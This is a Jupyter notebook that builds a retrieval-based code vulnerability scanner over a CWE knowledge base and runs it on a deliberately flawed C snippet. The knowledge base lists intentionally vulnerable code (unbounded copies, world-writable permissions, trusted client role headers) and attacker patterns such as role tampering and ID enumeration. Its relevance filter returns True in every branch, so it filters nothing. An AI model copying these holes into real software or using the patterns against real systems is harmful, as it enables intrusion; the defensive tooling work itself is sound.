            "ssl_context.minimum_version = ssl.TLSVersion.TLSv1_2"
        ]
    },
    "attack_patterns": [
        "Cipher suite downgrade attacks",
        "Hash collision exploitation",
        "Weak key generation testing",
        "Padding oracle attacks",
        "Side-channel timing analysis"
    ],
    "mitigation": "Use modern, vetted cryptographic algorithms (AES-GCM, SHA-256, RSA-2048+, ECDSA). Avoid deprecated algorithms (MD5, SHA-1, DES, RC4). Use established libraries rather than custom implementations. Implement proper key management and rotation. Follow cryptographic best practices and standards."
    },
    {
    "id": "CWE-269",
    "title": "Improper Privilege Management",
    "description": "Failure to properly manage, assign, or verify user privileges, allowing unauthorized privilege escalation or access",
    "category": "Access Control",
    "severity": "High",
    "code_examples": {
        "vulnerable": [
            "if request.body.role == 'admin': grant_admin_access()",
            "user.is_superuser = request.json.get('is_superuser', False)",
            "// No central privilege checking",
            "@app.route('/admin/users') def list_users(): return users  # No privilege check",
            "// Trusting client role headers",
            "if request.headers['X-Role'] == 'admin': allow_sensitive_operation()",
            "// Attacker patterns",
            "POST /users with {'role': 'admin'} from low-privilege account",
            "Replay of leaked admin tokens",
            "Setting is_superuser=true in user update requests"
        ],
        "secure": [
            "// Server-side privilege validation",
            "if user.role == 'admin': allow()  # From validated session",
            "// Centralized authorization",
            "@require_role('admin') def list_users(): ...",
            "// Policy-based access control",
            "if policy.can_access_resource(user, resource): allow()",
            "// Token validation",
            "claims = jwt.verify(token, SECRET)\nif 'admin' in claims.roles: allow()",
            "// Audit logging",
            "log_privilege_change(user, old_role, new_role, admin_user)"
        ]
    },
    "attack_patterns": [
        "Role parameter tampering: setting role=admin in requests",
        "Token replay: using leaked privileged tokens",
        "Endpoint probing: testing admin endpoints with low privileges",
        "Privilege escalation sequences: create → modify → elevate",
        "Header injection: X-Role, X-Admin headers"
    ],
    "mitigation": "Implement centralized privilege management with RBAC/ABAC. Never trust client-supplied role data. Validate all tokens server-side. Implement audit logging for privilege changes. Use least privilege principle and require step-up authentication for sensitive operations."
    },
    {
    "id": "CWE-863",
    "title": "Incorrect Authorization",
    "description": "Authorization logic errors that allow unauthorized access to resources through improper ownership verification or missing checks",
    "category": "Access Control",
    "severity": "High",
    "code_examples": {
        "vulnerable": [
            "if request.body.user_id == current_user.id: allow_access()",
            "// Authorization after side effects",
            "process_payment(); check_authorization()",
            "// Missing authorization",
            "@app.route('/invoices/<id>') def get_invoice(id): return db.get(id)",
            "// Permissive defaults",
            "if not check_owner(): log.warning('Unauthorized')  # Still return data",
            "// Attacker patterns",
            "GET /invoices/12345 (belongs to other user)",
            "PUT /users/567 with modified owner_id",
            "Sequential ID enumeration to find accessible resources"
        ],
        "secure": [
            "// Server-side ownership verification",
            "invoice = db.get_invoice(id)\nif invoice.owner_id != current_user.id: deny()",
            "// Authorization before actions",
            "check_authorization(); process_payment()",
            "// Centralized checks",
            "@require_ownership('invoice') def get_invoice(id): ...",
            "// Fail-closed approach",
            "if not authorized: return 404  # Not 403 to avoid enumeration",
            "// Automated testing",
            "test_horizontal_access_control()",
            "test_vertical_privilege_escalation()"
        ]
    },
    "attack_patterns": [
        "ID manipulation: changing resource IDs in URLs/body",
        "Horizontal privilege escalation: accessing other users' resources",
        "Authorization bypass: missing checks in certain endpoints",
        "Post-authorization: actions performed before verification",
        "Enumeration attacks: sequential ID probing"
    ],
    "mitigation": "Always perform server-side resource ownership verification. Implement centralized authorization middleware. Ensure authorization occurs before side effects. Use uniform error responses to prevent enumeration. Conduct regular access control testing and monitoring."
    },
    {
    "id": "CWE-119",
    "title": "Improper Restriction of Operations within Bounds of Memory Buffer",
    "description": "Memory safety violations where operations exceed buffer boundaries, leading to corruption, crashes, or code execution",
    "category": "Memory Safety",
    "severity": "High-Critical",
    "code_examples": {
        "vulnerable": [
            "strcpy(dest, user_input)  // No bounds checking",
            "memcpy(buffer, data, user_controlled_size)",
            "buffer[user_index] = value  // No range check",
            "for (i=0; i<=size; i++) buffer[i] = data[i]  // Off-by-one",
            "ptr = malloc(count * sizeof(int))  // Possible overflow",
            "// Attacker patterns",
            "len=9999999 in size fields",
            "index=-1 or large negative values",
            "Repetitive patterns to test boundaries",
            "Encoding sequences causing expansion"
        ],
        "secure": [
            "strncpy(dest, src, sizeof(dest)-1); dest[sizeof(dest)-1] = '\\0'",
            "if (size < buffer_size) memcpy(buffer, data, size)",
            "if (index >= 0 && index < buffer_size) buffer[index] = value",
            "for (i=0; i < min(size, buffer_size); i++) buffer[i] = data[i]",
            "// Safe allocation",
            "if (count > MAX_SAFE_COUNT || count < 0) return error",
            "if (count > SIZE_MAX / sizeof(int)) return error",
            "ptr = malloc(count * sizeof(int))",
            "// Bounds-checked functions",
            "strcpy_s(dest, sizeof(dest), src)",
            "memcpy_s(dest, dest_size, src, src_size)"
        ]
    },
    "attack_patterns": [
        "Buffer overflow: excessive input sizes",
        "Off-by-one errors: boundary condition testing",
        "Integer overflow: large size calculations",
        "Signed/unsigned confusion: negative values in size contexts",
        "Heap exploitation: crafted allocation patterns"
    ],
    "mitigation": "Use memory-safe languages when possible. Replace unsafe functions with bounded alternatives. Implement comprehensive bounds checking. Use compiler protections (ASAN, stack canaries). Validate all size calculations for overflow. Conduct fuzz testing and static analysis."
    },
    {
    "id": "CWE-400",
    "title": "Uncontrolled Resource Consumption",
    "description": "Failure to properly limit resource allocation, leading to denial of service through resource exhaustion",
    "category": "Availability",
    "severity": "Medium-High",
    "code_examples": {
        "vulnerable": [
            "data = request.files['file'].read()  // No size limit",
            "users = User.query.all()  // No pagination",
            "while True: process(request_queue.get())  // No timeout",
            "image = Image.open(upload).resize((width, height))  // No dimension limits",
            "// Attacker patterns",
            "Large file uploads (1GB+)",
            "Deeply nested JSON/XML",
            "Many concurrent connections",
            "Zip bombs or decompression bombs"
        ],
        "secure": [
            "// Size limits",
            "if file.size > MAX_UPLOAD_SIZE: reject()",
            "// Pagination",
            "users = User.query.paginate(page, PER_PAGE)",
            "// Timeouts",
            "with timeout(30): process_data()",
            "// Resource limits",
            "if width * height > MAX_PIXELS: reject()",
            "// Rate limiting",
            "@limiter.limit(\"100/hour\") def upload(): ...",
            "// Input validation",
            "validate_json_depth(json_data, max_depth=10)"
        ]
    },
    "attack_patterns": [
        "Resource exhaustion: memory, CPU, disk space consumption",
        "Amplification attacks: small input causing large resource usage",
        "Connection pooling exhaustion: many simultaneous requests",
        "Decompression bombs: small compressed files that expand enormously",
        "Algorithmic complexity attacks: worst-case input patterns"
    ],
    "mitigation": "Implement comprehensive resource limits (size, time, memory). Use rate limiting and throttling. Validate input complexity and structure. Monitor resource usage and set alerts. Use timeouts for all operations. Test with worst-case inputs."
    },
    {
    "id": "CWE-732",
    "title": "Incorrect Permission Assignment for Critical Resource",
    "description": "Assigning incorrect permissions or privileges to resources, allowing unauthorized access or modification",
    "category": "Configuration",
    "severity": "Medium-High",
    "code_examples": {
        "vulnerable": [
            "chmod 777 /var/www/uploads  // World-writable",
            "file.save('/webroot/config.json')  // Web-accessible config",
            "db_user = 'admin'  // Default credentials",
            "// Insecure cloud permissions",
            "AWS S3 bucket with public write access",
            "Database user with unnecessary privileges",
            "// Attacker patterns",
            "Writing files to world-writable directories",
            "Reading configuration files via web server",
            "Using default service account permissions"
        ],
        "secure": [
            "chmod 750 /var/www/uploads  // Owner and group only",
            "file.save('/etc/app/config.json')  // Outside webroot",
            "// Principle of least privilege",
            "db_user = 'app_readonly'  // Minimal privileges",
            "// Secure cloud configuration",
            "s3_bucket.put_public_access_block(BlockPublicAcls=True)",
            "// Automated permission scanning",
            "scan_file_permissions()",
            "audit_cloud_permissions()",
            "// Secret management",
            "secrets = vault.read('database/credentials')"
        ]
    },
    "attack_patterns": [
        "Permission discovery: scanning for misconfigured resources",
        "Default credential usage: admin/password combinations",
        "Configuration file access: via web server or insecure paths",
        "Privilege escalation through service accounts",
        "Public resource modification: world-writable files/directories"
    ],
    "mitigation": "Apply principle of least privilege to all resources. Regularly audit permissions and configurations. Use secure defaults and change them. Implement automated security scanning. Store secrets properly and rotate them regularly. Conduct penetration testing for permission issues."
}
]

print(f"Created vulnerability database with {len(vulnerabilities)} entries")

# Save to file
with open('vulnerability_knowledge_base.json', 'w') as f:
    json.dump(vulnerabilities, f, indent=2)

Created vulnerability database with 26 entries


In [6]:
# === CELL 3: Simple Universal Security RAG ===
import chromadb
from sentence_transformers import SentenceTransformer

print("Setting up universal security RAG...")

class UniversalSecurityRAG:
    def __init__(self):
        self.embedder = SentenceTransformer('all-MiniLM-L6-v2')
        self.client = chromadb.Client()

        try:
            self.collection = self.client.get_collection("universal_scanner")
            print("Using existing universal collection...")
        except:
            self.collection = self.client.create_collection("universal_scanner")
            print("Created new universal collection...")

    def add_vulnerabilities(self, vulns):
        try:
            self.collection.delete(where={})
            print("Cleared existing data...")
        except:
            print("Starting fresh...")

        documents = []
        metadatas = []
        ids = []

        for i, vuln in enumerate(vulns):
            # Simple, clean vulnerability description
            doc_text = f"{vuln['title']}: {vuln['description']}. Examples: {vuln['code_examples']['vulnerable']}"
            documents.append(doc_text)

            metadatas.append({
                "id": vuln['id'],
                "title": vuln['title'],
                "severity": vuln['severity'],
                "category": vuln['category']
            })
            ids.append(f"vuln_{i}")

        self.collection.add(
            documents=documents,
            metadatas=metadatas,
            ids=ids
        )
        print(f"Added {len(vulns)} vulnerabilities")

    def search(self, code_snippet, n_results=5):
        # Get results WITH distances (similarity scores)
        results = self.collection.query(
            query_texts=[code_snippet],
            n_results=n_results,
            include=['distances', 'metadatas', 'documents']  # Include distances for scores
        )

        # Convert distances to normalized similarity scores (0.0 to 1.0)
        if results['distances'][0]:
            max_distance = max(results['distances'][0])
            similarities = [1 - (dist / max_distance) if max_distance > 0 else 1.0
                          for dist in results['distances'][0]]
        else:
            similarities = []

        # Minimal relevance filtering with scores
        filtered_results = self._simple_relevance_filter_with_scores(code_snippet, results, similarities)
        return filtered_results

    def _simple_relevance_filter_with_scores(self, code, results, similarities):
        """Basic filtering with similarity scores"""
        filtered_metadatas = []
        filtered_documents = []
        filtered_scores = []

        for i, metadata in enumerate(results['metadatas'][0]):
            if self._is_relevant_to_code(code, metadata):
                filtered_metadatas.append(metadata)
                filtered_documents.append(results['documents'][0][i])
                filtered_scores.append(similarities[i])

        return {
            'documents': [filtered_documents],
            'metadatas': [filtered_metadatas],
            'scores': [filtered_scores]  # Add scores to results
        }

    def _is_relevant_to_code(self, code, metadata):
        """Check if vulnerability type could plausibly exist in this code"""
        vuln_id = metadata['id']

        # Very basic relevance checks for all your CWE types
        if vuln_id == "CWE-89" and ("SELECT" in code or "INSERT" in code or "UPDATE" in code or "DELETE" in code):
            return True
        elif vuln_id == "CWE-79" and ("<" in code or "innerHTML" in code or "document.write" in code or "eval(" in code):
            return True
        elif vuln_id == "CWE-78" and ("exec" in code or "system" in code or "spawn" in code or "popen" in code):
            return True
        elif vuln_id == "CWE-352" and ("POST" in code or "form" in code or "csrf" in code or "token" in code):
            return True
        elif vuln_id == "CWE-22" and ("open" in code or "file" in code or "readFile" in code or "writeFile" in code):
            return True
        elif vuln_id == "CWE-918" and ("http" in code or "fetch" in code or "requests" in code or "axios" in code):
            return True
        elif vuln_id == "CWE-502" and ("pickle" in code or "yaml" in code or "unserialize" in code or "marshal" in code):
            return True
        elif vuln_id == "CWE-798" and ("API_KEY" in code or "password" in code or "SECRET" in code or "PRIVATE_KEY" in code):
            return True
        elif vuln_id == "CWE-862" and ("auth" in code or "login" in code or "permission" in code or "role" in code):
            return True
        elif vuln_id == "CWE-434" and ("upload" in code or "file" in code or "multipart" in code or "form-data" in code):
            return True
        elif vuln_id == "CWE-94" and ("eval" in code or "exec" in code or "code" in code or "compile" in code):
            return True
        elif vuln_id == "CWE-20" and ("input" in code or "validate" in code or "sanitize" in code or "check" in code):
            return True
        elif vuln_id == "CWE-77" and ("command" in code or "exec" in code or "system" in code or "shell" in code):
            return True
        elif vuln_id == "CWE-287" and ("auth" in code or "login" in code or "password" in code or "credential" in code):
            return True
        elif vuln_id == "CWE-200" and ("secret" in code or "password" in code or "key" in code or "token" in code):
            return True
        elif vuln_id == "CWE-327" and ("md5" in code or "sha1" in code or "crypto" in code or "encrypt" in code):
            return True
        elif vuln_id == "CWE-269" and ("privilege" in code or "admin" in code or "root" in code or "sudo" in code):
            return True
        elif vuln_id == "CWE-863" and ("auth" in code or "permission" in code or "access" in code or "role" in code):
            return True
        elif vuln_id == "CWE-119" and ("buffer" in code or "memory" in code or "malloc" in code or "array" in code):
            return True
        elif vuln_id == "CWE-400" and ("resource" in code or "memory" in code or "loop" in code or "infinite" in code):
            return True
        elif vuln_id == "CWE-732" and ("permission" in code or "chmod" in code or "access" in code or "privilege" in code):
            return True
        elif vuln_id in ["CWE-476", "CWE-190", "CWE-416", "CWE-787", "CWE-125"]:
            # Memory safety issues - hard to detect statically in high-level languages
            # Be permissive for these
            return True
        else:
            # For any other CWEs, be permissive
            return True

# Initialize simple RAG
rag = UniversalSecurityRAG()
rag.add_vulnerabilities(vulnerabilities)
print("Universal security RAG ready!")

Setting up universal security RAG...
Using existing universal collection...
Starting fresh...
Added 26 vulnerabilities
Universal security RAG ready!


In [7]:
# AI Model
from transformers import pipeline
import torch

try:
    # Check GPU memory again
    if torch.cuda.is_available():
        gpu_memory = torch.cuda.get_device_properties(0).total_memory / 1024**3
        print(f"GPU Memory available: {gpu_memory:.1f} GB")
    else:
        gpu_memory = 0
        print("No GPU available")

    # Choose model
    if gpu_memory > 8:
        model_name = "microsoft/DialoGPT-medium"
        print("DialoGPT-medium (better quality)")
    else:
        model_name = "microsoft/DialoGPT-small"
        print("DialoGPT-small (faster, less memory)")

    chat_ai = pipeline(
        "text-generation",
        model=model_name,
        torch_dtype=torch.float16,
        device_map="auto" if torch.cuda.is_available() else None,
        max_length=500
    )
    print("AI model loaded.")

except Exception as e:
    print(f"Could not load AI model: {e}")
    print("Continuing with RAG-only mode.")
    chat_ai = None

No GPU available
DialoGPT-small (faster, less memory)


Device set to use cpu


AI model loaded.


In [11]:
# === CELL 5: Simple Universal Security Scanner ===

# === CELL 5: Scanner with Similarity Scores ===
class UniversalSecurityScanner:
    def __init__(self, rag_system, ai_model):
        self.rag = rag_system
        self.ai = ai_model

    def scan(self, code_snippet):
        # Get vulnerability matches WITH scores
        search_results = self.rag.search(code_snippet)
        found_vulns = search_results['metadatas'][0]
        similarity_scores = search_results.get('scores', [[]])[0]  # Get scores if available

        # Attach scores to vulnerabilities
        vulns_with_scores = []
        for i, vuln in enumerate(found_vulns):
            score = similarity_scores[i] if i < len(similarity_scores) else 0.0
            # Create a copy to avoid modifying original data
            vuln_copy = vuln.copy()
            vuln_copy['similarity_score'] = round(score, 3)
            vulns_with_scores.append(vuln_copy)

        # Simple analysis
        if vulns_with_scores:
            analysis = f"Found {len(vulns_with_scores)} potential security issues"
        else:
            analysis = "No security issues detected"

        return {
            'code': code_snippet,
            'found_vulnerabilities': vulns_with_scores,
            'analysis': analysis
        }

    def print_scan_results(self, results):
        print(f"Code scanned:\n```\n{results['code']}\n```")

        if results['found_vulnerabilities']:
            print("\nPotential issues found:")
            for vuln in results['found_vulnerabilities']:
                score = vuln.get('similarity_score', 0.0)
                print(f"  - {vuln['title']} ({vuln['id']}) - {vuln['severity']} risk [score: {score}]")
        else:
            print("\nNo security issues detected")

        print(f"\n{results['analysis']}")

scanner = UniversalSecurityScanner(rag, chat_ai)

test_case = """
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void risky_copy(const char *input) {
    char buf[16];
    // vulnerable: using strlen(input) without checking destination size
    memcpy(buf, input, strlen(input)); // potential OOB write
    buf[15] = '\0';
    printf("%s\n", buf);
}

int get_index_and_read(int idx, int *array, int len) {
    // vulnerable: no bounds check on idx
    return array[idx]; // potential OOB read
}
"""

results = scanner.scan(test_case)
scanner.print_scan_results(results)

Code scanned:
```

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void risky_copy(const char *input) {
    char buf[16];
    // vulnerable: using strlen(input) without checking destination size
    memcpy(buf, input, strlen(input)); // potential OOB write
    buf[15] = ' ';
    printf("%s
", buf);
}

int get_index_and_read(int idx, int *array, int len) {
    // vulnerable: no bounds check on idx
    return array[idx]; // potential OOB read
}

```

Potential issues found:
  - Improper Restriction of Operations within Bounds of Memory Buffer (CWE-119) - High-Critical risk [score: 0.349]
  - Out-of-Bounds Write (CWE-787) - High-Critical risk [score: 0.344]
  - Out-of-Bounds Read (CWE-125) - Medium-High risk [score: 0.3]
  - Integer Overflow or Wraparound (CWE-190) - High risk [score: 0.131]
  - NULL Pointer Dereference (CWE-476) - Medium risk [score: 0.0]

Found 5 potential security issues
